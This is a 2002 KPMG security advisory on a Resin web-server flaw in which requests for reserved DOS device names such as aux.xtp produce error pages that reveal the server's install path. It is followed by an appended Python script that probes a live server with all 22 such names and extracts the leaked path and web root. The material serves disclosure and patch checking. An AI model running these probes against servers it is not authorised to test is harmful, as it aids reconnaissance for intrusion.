--------------------------------------------------------------------
Title:    Resin DOS device path disclosure
BUG-ID:   2002033
Released: 17th Jul 2002
--------------------------------------------------------------------

Problem:
========
It is possible to disclose the physical path to the web root. This
information could be useful to a malicious user seeking unauthorized
access to resources on the server, since it reveals the installation
directory and the account layout of the host.

Vulnerable:
===========
- Resin 2.1.1 on Windows 2000 Server
- Resin 2.1.2 on Windows 2000 Server

Not Vulnerable:
===============
- Resin 2.1.s020711 on Windows 2000 Server

Details:
========
Requesting a reserved DOS device name with an extension that Resin
handles, such as lpt9.xtp or aux.xtp, makes Resin try to open the
name as a file under the web root. Windows resolves names such as
AUX and LPT9 to the device rather than to a file regardless of the
extension, the open fails, and the resulting error page echoes the
absolute path that was attempted:

500 Servlet Exception
java.io.FileNotFoundException: C:\Documents and Settings\Administrator\Desktop\resin-2.1.1\resin-2.1.1\doc\aux.xtp (Access is denied)

Vendor URL:
===========
You can visit the vendor webpage here:
http://www.caucho.com

Vendor response:
================
The vendor was notified on the 22nd of May, 2002. On the 12th of
July we verified that the problem was corrected in the latest build
(s020711).

Corrective action:
==================
Upgrade to a newer version. This issue was first resolved in build
s020711, available here:
http://www.caucho.com/download/index.xtp

Author: Peter Gründl (pgrundl@kpmg.dk)

--------------------------------------------------------------------
KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be
liable for any consequences whatsoever arising out of or in
connection with the use or spread of this information.
--------------------------------------------------------------------
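As an added check for the issue described in this advisory (example code written for this page, not part of the KPMG advisory or of Caucho's Resin), the script below builds probe URLs for every Windows reserved device name with the .xtp extension and extracts the leaked path and web root from an error page of the form quoted above. The sample error page is constructed from that quoted message; the check_server helper, its timeout, and the assumption that Resin returns the error text in the body of an HTTP 500 response are this example's own.

```python
import re
import urllib.error
import urllib.parse
import urllib.request

# Names Windows reserves for DOS devices. The OS resolves them to the
# device regardless of directory or extension, so "aux.xtp" is AUX, not a file.
RESERVED_DEVICE_NAMES = (
    ["CON", "PRN", "AUX", "NUL"]
    + [f"COM{i}" for i in range(1, 10)]
    + [f"LPT{i}" for i in range(1, 10)]
)

# Absolute Windows path quoted in a java.io.FileNotFoundException message,
# terminated by the parenthesised reason, e.g. "(Access is denied)".
WINDOWS_PATH_RE = re.compile(
    r"FileNotFoundException:\s*([A-Za-z]:\\[^\r\n(]+?)\s*\("
)

# Constructed sample, modelled on the error text in the advisory (not a live capture).
SAMPLE_ERROR_PAGE = (
    "500 Servlet Exception\n"
    "java.io.FileNotFoundException: C:\\Documents and Settings\\Administrator"
    "\\Desktop\\resin-2.1.1\\resin-2.1.1\\doc\\aux.xtp (Access is denied)\n"
)


def probe_urls(base_url, ext="xtp", names=RESERVED_DEVICE_NAMES):
    """Build one request URL per reserved device name with the given extension."""
    base = base_url.rstrip("/")
    return [f"{base}/{name.lower()}.{ext}" for name in names]


def extract_disclosed_path(body):
    """Return the filesystem path leaked in an error page, or None if absent."""
    match = WINDOWS_PATH_RE.search(body)
    if not match:
        return None
    return match.group(1).strip()


def web_root_from_path(leaked_path, requested_name):
    """Strip the requested filename from the leaked path to recover the web root."""
    head, _, tail = leaked_path.rpartition("\\")
    if tail.lower() == requested_name.lower():
        return head
    # The server did not echo the name we asked for; return the path as-is.
    return leaked_path


def check_server(base_url, ext="xtp", timeout=10):
    """Probe a live server; returns {url: leaked_path} for responses that disclose a path.

    Assumption (hypothetical, not from the advisory): the error page arrives as the
    body of an HTTP 500, which urllib raises as HTTPError, so the body is read from it.
    """
    findings = {}
    for url in probe_urls(base_url, ext):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("latin-1", "replace")
        except urllib.error.HTTPError as err:
            body = err.read().decode("latin-1", "replace")
        except urllib.error.URLError:
            continue  # connection refused, timeout, etc.: nothing to inspect
        leaked = extract_disclosed_path(body)
        if leaked:
            findings[url] = leaked
    return findings


if __name__ == "__main__":
    # Offline demonstration on the constructed sample page.
    path = extract_disclosed_path(SAMPLE_ERROR_PAGE)
    print("leaked path:", path)
    print("web root:   ", web_root_from_path(path, "aux.xtp"))
```

The regex deliberately stops at the first "(" so the reason text is not mistaken for part of the path; a patched build (s020711 or later) should yield no match for any of the 22 probe URLs.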